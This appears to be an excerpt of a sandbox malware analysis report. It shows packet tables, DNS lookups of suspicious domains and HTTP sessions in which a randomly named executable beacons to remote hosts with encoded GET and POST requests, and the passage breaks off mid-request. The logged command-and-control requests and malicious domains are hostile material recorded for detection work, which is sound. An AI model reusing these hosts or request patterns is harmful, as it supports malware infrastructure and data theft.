Jan 11, 2025 04:17:14.012012005 CET  80           49982      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:14.012075901 CET  80           49982      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:14.012113094 CET  80           49982      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:14.012146950 CET  80           49982      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:14.012200117 CET  80           49982      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:14.012237072 CET  80           49982      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:14.012290001 CET  49982        80         192.168.2.7      104.18.73.116
Jan 11, 2025 04:17:14.012372017 CET  49982        80         192.168.2.7      104.18.73.116
Jan 11, 2025 04:17:14.012723923 CET  80           49982      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:14.012792110 CET  49982        80         192.168.2.7      104.18.73.116
Jan 11, 2025 04:17:15.093487978 CET  49982        80         192.168.2.7      104.18.73.116
Jan 11, 2025 04:17:16.111977100 CET  49983        80         192.168.2.7      104.18.73.116
Jan 11, 2025 04:17:16.117033958 CET  80           49983      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:16.117152929 CET  49983        80         192.168.2.7      104.18.73.116
Jan 11, 2025 04:17:16.132200003 CET  49983        80         192.168.2.7      104.18.73.116
Jan 11, 2025 04:17:16.137129068 CET  80           49983      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:16.576186895 CET  80           49983      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:16.576250076 CET  80           49983      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:16.576291084 CET  80           49983      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:16.576324940 CET  80           49983      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:16.576339960 CET  49983        80         192.168.2.7      104.18.73.116
Jan 11, 2025 04:17:16.576360941 CET  80           49983      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:16.576383114 CET  49983        80         192.168.2.7      104.18.73.116
Jan 11, 2025 04:17:16.576399088 CET  80           49983      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:16.576451063 CET  49983        80         192.168.2.7      104.18.73.116
Jan 11, 2025 04:17:16.576725006 CET  80           49983      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:16.576787949 CET  49983        80         192.168.2.7      104.18.73.116
Jan 11, 2025 04:17:17.640120983 CET  49983        80         192.168.2.7      104.18.73.116
Jan 11, 2025 04:17:18.658776045 CET  49984        80         192.168.2.7      104.18.73.116
Jan 11, 2025 04:17:18.663806915 CET  80           49984      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:18.663909912 CET  49984        80         192.168.2.7      104.18.73.116
Jan 11, 2025 04:17:18.677880049 CET  49984        80         192.168.2.7      104.18.73.116
Jan 11, 2025 04:17:18.682768106 CET  80           49984      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:18.682939053 CET  80           49984      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:19.121052980 CET  80           49984      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:19.121128082 CET  80           49984      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:19.121144056 CET  80           49984      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:19.121222973 CET  49984        80         192.168.2.7      104.18.73.116
Jan 11, 2025 04:17:19.121289968 CET  80           49984      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:19.121305943 CET  80           49984      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:19.121320963 CET  80           49984      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:19.121335983 CET  80           49984      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:19.121345043 CET  49984        80         192.168.2.7      104.18.73.116
Jan 11, 2025 04:17:19.121364117 CET  49984        80         192.168.2.7      104.18.73.116
Jan 11, 2025 04:17:19.121397972 CET  49984        80         192.168.2.7      104.18.73.116
Jan 11, 2025 04:17:20.187063932 CET  49984        80         192.168.2.7      104.18.73.116
Jan 11, 2025 04:17:21.205681086 CET  49985        80         192.168.2.7      104.18.73.116
Jan 11, 2025 04:17:21.210726023 CET  80           49985      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:21.210835934 CET  49985        80         192.168.2.7      104.18.73.116
Jan 11, 2025 04:17:21.220016003 CET  49985        80         192.168.2.7      104.18.73.116
Jan 11, 2025 04:17:21.224963903 CET  80           49985      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:21.661411047 CET  80           49985      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:21.661655903 CET  80           49985      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:21.661721945 CET  49985        80         192.168.2.7      104.18.73.116
Jan 11, 2025 04:17:21.664151907 CET  49985        80         192.168.2.7      104.18.73.116
Jan 11, 2025 04:17:21.668921947 CET  80           49985      104.18.73.116    192.168.2.7
Jan 11, 2025 04:17:26.997443914 CET  49986        80         192.168.2.7      192.185.147.100
Jan 11, 2025 04:17:27.002443075 CET  80           49986      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:27.002576113 CET  49986        80         192.168.2.7      192.185.147.100
Jan 11, 2025 04:17:27.017071962 CET  49986        80         192.168.2.7      192.185.147.100
Jan 11, 2025 04:17:27.021987915 CET  80           49986      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:28.228260040 CET  80           49986      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:28.228353024 CET  80           49986      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:28.228367090 CET  80           49986      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:28.228388071 CET  80           49986      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:28.228399992 CET  80           49986      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:28.228411913 CET  80           49986      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:28.228425026 CET  80           49986      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:28.228437901 CET  80           49986      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:28.228466988 CET  49986        80         192.168.2.7      192.185.147.100
Jan 11, 2025 04:17:28.228519917 CET  49986        80         192.168.2.7      192.185.147.100
Jan 11, 2025 04:17:28.228610992 CET  80           49986      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:28.228625059 CET  80           49986      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:28.228682041 CET  49986        80         192.168.2.7      192.185.147.100
Jan 11, 2025 04:17:28.233323097 CET  80           49986      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:28.247891903 CET  80           49986      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:28.247905970 CET  80           49986      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:28.247955084 CET  49986        80         192.168.2.7      192.185.147.100
Jan 11, 2025 04:17:28.315947056 CET  80           49986      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:28.315973997 CET  80           49986      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:28.316036940 CET  80           49986      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:28.316052914 CET  49986        80         192.168.2.7      192.185.147.100
Jan 11, 2025 04:17:28.316055059 CET  80           49986      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:28.316112041 CET  49986        80         192.168.2.7      192.185.147.100
Jan 11, 2025 04:17:28.316152096 CET  80           49986      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:28.316301107 CET  80           49986      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:28.316320896 CET  80           49986      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:28.316353083 CET  49986        80         192.168.2.7      192.185.147.100
Jan 11, 2025 04:17:28.316617012 CET  80           49986      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:28.316672087 CET  49986        80         192.168.2.7      192.185.147.100
Jan 11, 2025 04:17:28.316721916 CET  80           49986      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:28.316776991 CET  49986        80         192.168.2.7      192.185.147.100
Jan 11, 2025 04:17:28.531176090 CET  49986        80         192.168.2.7      192.185.147.100
Jan 11, 2025 04:17:29.551337957 CET  49987        80         192.168.2.7      192.185.147.100
Jan 11, 2025 04:17:29.556246996 CET  80           49987      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:29.556384087 CET  49987        80         192.168.2.7      192.185.147.100
Jan 11, 2025 04:17:29.577096939 CET  49987        80         192.168.2.7      192.185.147.100
Jan 11, 2025 04:17:29.581959009 CET  80           49987      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:30.351012945 CET  80           49987      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:30.351048946 CET  80           49987      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:30.351058960 CET  80           49987      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:30.351099014 CET  49987        80         192.168.2.7      192.185.147.100
Jan 11, 2025 04:17:30.351129055 CET  80           49987      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:30.351145029 CET  80           49987      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:30.351263046 CET  49987        80         192.168.2.7      192.185.147.100
Jan 11, 2025 04:17:30.351274967 CET  80           49987      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:30.351288080 CET  80           49987      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:30.351300001 CET  80           49987      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:30.351351023 CET  80           49987      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:30.351362944 CET  49987        80         192.168.2.7      192.185.147.100
Jan 11, 2025 04:17:30.351363897 CET  80           49987      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:30.351363897 CET  49987        80         192.168.2.7      192.185.147.100
Jan 11, 2025 04:17:30.351474047 CET  49987        80         192.168.2.7      192.185.147.100
Jan 11, 2025 04:17:30.355911016 CET  80           49987      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:30.370824099 CET  80           49987      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:30.370836020 CET  80           49987      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:30.370873928 CET  49987        80         192.168.2.7      192.185.147.100
Jan 11, 2025 04:17:30.438064098 CET  80           49987      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:30.438087940 CET  80           49987      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:30.438098907 CET  80           49987      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:30.438152075 CET  49987        80         192.168.2.7      192.185.147.100
Jan 11, 2025 04:17:30.438225985 CET  80           49987      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:30.438239098 CET  80           49987      192.185.147.100  192.168.2.7
Jan 11, 2025 04:17:30.438368082 CET  49987        80         192.168.2.7      192.185.147.100
Jan 11, 2025 04:17:30.438570023 CET  80           49987      192.185.147.100  192.168.2.7
                                                            Jan 11, 2025 04:17:30.438611984 CET4998780192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:30.438618898 CET8049987192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:30.438811064 CET4998780192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:31.093606949 CET4998780192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:32.112035990 CET4998880192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:32.116975069 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.117125988 CET4998880192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:32.136231899 CET4998880192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:32.141087055 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.141249895 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.930345058 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.930368900 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.930381060 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.930438042 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.930450916 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.930452108 CET4998880192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:32.930506945 CET4998880192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:32.930598974 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.930646896 CET4998880192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:32.930649996 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.930664062 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.930677891 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.930705070 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.930710077 CET4998880192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:32.930763006 CET4998880192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:32.935276985 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.935297966 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.935368061 CET4998880192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:32.950774908 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.950807095 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:32.950875998 CET4998880192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:33.017296076 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:33.017343044 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:33.017406940 CET4998880192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:33.017422915 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:33.017458916 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:33.017493963 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:33.017508030 CET4998880192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:33.017529011 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:33.017575026 CET4998880192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:33.017776966 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:33.017878056 CET8049988192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:33.017925978 CET4998880192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:33.642508030 CET4998880192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:34.658907890 CET4998980192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:34.664098978 CET8049989192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:34.664241076 CET4998980192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:34.673593044 CET4998980192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:34.678459883 CET8049989192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:35.270965099 CET8049989192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:35.271169901 CET8049989192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:35.271262884 CET4998980192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:35.273895979 CET4998980192.168.2.7192.185.147.100
                                                            Jan 11, 2025 04:17:35.278861046 CET8049989192.185.147.100192.168.2.7
                                                            Jan 11, 2025 04:17:40.299060106 CET4999080192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:40.304035902 CET804999013.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:40.304163933 CET4999080192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:40.320976019 CET4999080192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:40.325824022 CET804999013.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:40.763919115 CET804999013.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:40.763978958 CET804999013.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:40.765853882 CET4999080192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:41.831217051 CET4999080192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:42.846554041 CET4999180192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:42.851531982 CET804999113.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:42.851730108 CET4999180192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:42.866703033 CET4999180192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:42.871649981 CET804999113.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:43.321705103 CET804999113.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:43.321737051 CET804999113.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:43.321805000 CET4999180192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:44.374587059 CET4999180192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:45.393651009 CET4999280192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:45.398633003 CET804999213.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:45.398746967 CET4999280192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:45.421041965 CET4999280192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:45.425955057 CET804999213.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:45.426067114 CET804999213.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:45.866480112 CET804999213.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:45.866651058 CET804999213.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:45.866714001 CET4999280192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:46.937349081 CET4999280192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:47.956041098 CET4999380192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:47.961069107 CET804999313.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:47.961143017 CET4999380192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:47.971817970 CET4999380192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:47.976763010 CET804999313.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:53.430593967 CET804999313.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:53.430696964 CET804999313.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:53.430763006 CET4999380192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:53.433779955 CET4999380192.168.2.713.248.169.48
                                                            Jan 11, 2025 04:17:53.438633919 CET804999313.248.169.48192.168.2.7
                                                            Jan 11, 2025 04:17:58.456650019 CET4999480192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:17:58.461507082 CET804999415.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:17:58.461579084 CET4999480192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:17:58.476680040 CET4999480192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:17:58.481584072 CET804999415.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:17:58.927802086 CET804999415.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:17:58.927856922 CET804999415.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:17:58.927917004 CET4999480192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:17:59.984040022 CET4999480192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:01.003422022 CET4999580192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:01.008284092 CET804999515.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:18:01.008420944 CET4999580192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:01.027430058 CET4999580192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:01.032242060 CET804999515.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:18:01.489027977 CET804999515.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:18:01.489125967 CET804999515.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:18:01.489180088 CET4999580192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:02.531420946 CET4999580192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:03.552736044 CET4999680192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:03.557600021 CET804999615.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:18:03.557666063 CET4999680192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:03.576286077 CET4999680192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:03.581088066 CET804999615.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:18:03.581217051 CET804999615.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:18:04.955147982 CET804999615.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:18:04.955323935 CET804999615.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:18:04.955418110 CET4999680192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:05.827828884 CET4999680192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:06.846808910 CET4999780192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:06.851723909 CET804999715.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:18:06.851830959 CET4999780192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:06.862514019 CET4999780192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:06.867394924 CET804999715.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:18:07.308546066 CET804999715.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:18:07.308603048 CET804999715.197.148.33192.168.2.7
                                                            Jan 11, 2025 04:18:07.308748007 CET4999780192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:07.311508894 CET4999780192.168.2.715.197.148.33
                                                            Jan 11, 2025 04:18:07.316355944 CET804999715.197.148.33192.168.2.7
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jan 11, 2025 04:16:44.119731903 CET5535253192.168.2.71.1.1.1
                                                            Jan 11, 2025 04:16:44.315184116 CET53553521.1.1.1192.168.2.7
                                                            Jan 11, 2025 04:17:00.143490076 CET4956353192.168.2.71.1.1.1
                                                            Jan 11, 2025 04:17:00.161803961 CET53495631.1.1.1192.168.2.7
                                                            Jan 11, 2025 04:17:13.533971071 CET5647153192.168.2.71.1.1.1
                                                            Jan 11, 2025 04:17:13.558950901 CET53564711.1.1.1192.168.2.7
                                                            Jan 11, 2025 04:17:26.674998045 CET5010953192.168.2.71.1.1.1
                                                            Jan 11, 2025 04:17:26.994784117 CET53501091.1.1.1192.168.2.7
                                                            Jan 11, 2025 04:17:40.284461021 CET6545153192.168.2.71.1.1.1
                                                            Jan 11, 2025 04:17:40.295955896 CET53654511.1.1.1192.168.2.7
                                                            Jan 11, 2025 04:17:58.441203117 CET6480453192.168.2.71.1.1.1
                                                            Jan 11, 2025 04:17:58.453977108 CET53648041.1.1.1192.168.2.7
                                                            Jan 11, 2025 04:18:12.315543890 CET5303553192.168.2.71.1.1.1
                                                            Jan 11, 2025 04:18:12.326966047 CET53530351.1.1.1192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 04:16:44.119731903 CET | 192.168.2.7 | 1.1.1.1 | 0xe186 | Standard query (0) | www.holytur.net | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:17:00.143490076 CET | 192.168.2.7 | 1.1.1.1 | 0xdde0 | Standard query (0) | www.nieuws-july202488.sbs | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:17:13.533971071 CET | 192.168.2.7 | 1.1.1.1 | 0xd0fa | Standard query (0) | www.losmason.shop | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:17:26.674998045 CET | 192.168.2.7 | 1.1.1.1 | 0xd888 | Standard query (0) | www.hayaniya.org | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:17:40.284461021 CET | 192.168.2.7 | 1.1.1.1 | 0x9543 | Standard query (0) | www.lovel.shop | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:17:58.441203117 CET | 192.168.2.7 | 1.1.1.1 | 0x3987 | Standard query (0) | www.duskgazes.work | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:18:12.315543890 CET | 192.168.2.7 | 1.1.1.1 | 0x5440 | Standard query (0) | www.zrinorem-srumimit.sbs | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 04:16:44.315184116 CET | 1.1.1.1 | 192.168.2.7 | 0xe186 | No error (0) | www.holytur.net | holytur.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 04:16:44.315184116 CET | 1.1.1.1 | 192.168.2.7 | 0xe186 | No error (0) | holytur.net | | 185.106.208.3 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:17:00.161803961 CET | 1.1.1.1 | 192.168.2.7 | 0xdde0 | No error (0) | www.nieuws-july202488.sbs | nieuws-july202488.sbs | | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 04:17:00.161803961 CET | 1.1.1.1 | 192.168.2.7 | 0xdde0 | No error (0) | nieuws-july202488.sbs | | 162.0.215.33 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:17:13.558950901 CET | 1.1.1.1 | 192.168.2.7 | 0xd0fa | No error (0) | www.losmason.shop | | 104.18.73.116 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:17:26.994784117 CET | 1.1.1.1 | 192.168.2.7 | 0xd888 | No error (0) | www.hayaniya.org | hayaniya.org | | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 04:17:26.994784117 CET | 1.1.1.1 | 192.168.2.7 | 0xd888 | No error (0) | hayaniya.org | | 192.185.147.100 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:17:40.295955896 CET | 1.1.1.1 | 192.168.2.7 | 0x9543 | No error (0) | www.lovel.shop | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:17:40.295955896 CET | 1.1.1.1 | 192.168.2.7 | 0x9543 | No error (0) | www.lovel.shop | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:17:58.453977108 CET | 1.1.1.1 | 192.168.2.7 | 0x3987 | No error (0) | www.duskgazes.work | duskgazes.work | | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 04:17:58.453977108 CET | 1.1.1.1 | 192.168.2.7 | 0x3987 | No error (0) | duskgazes.work | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:17:58.453977108 CET | 1.1.1.1 | 192.168.2.7 | 0x3987 | No error (0) | duskgazes.work | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:18:12.326966047 CET | 1.1.1.1 | 192.168.2.7 | 0x5440 | No error (0) | www.zrinorem-srumimit.sbs | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:18:12.326966047 CET | 1.1.1.1 | 192.168.2.7 | 0x5440 | No error (0) | www.zrinorem-srumimit.sbs | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
• www.holytur.net
• www.nieuws-july202488.sbs
• www.losmason.shop
• www.hayaniya.org
• www.lovel.shop
• www.duskgazes.work
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49929 | 185.106.208.3 | 80 | 6896 | C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:16:44.380201101 CET | 551 | OUT | GET /cs9k/?MHJ0GXi=W7SiLeR8lVOS0IddzXWoYXDt6RHub9Z/llH5xMN7IPTa857c9EQRUjsfmtg32BbwdcsWIPqYG66ejHdS265gqPapChlQiVLnuWWyjSHSngUOewn7sS2CIDtXVuGZPpJOLluzJeAwPaf/&nHI4y=ULkH023p-2 HTTP/1.1
Host: www.holytur.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Connection: close
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 11, 2025 04:16:45.093354940 CET | 304 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 11 Jan 2025 03:16:44 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 146
Connection: close
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49978 | 162.0.215.33 | 80 | 6896 | C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:17:00.184354067 CET | 835 | OUT | POST /30le/ HTTP/1.1
Host: www.nieuws-july202488.sbs
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Accept-Encoding: gzip, deflate
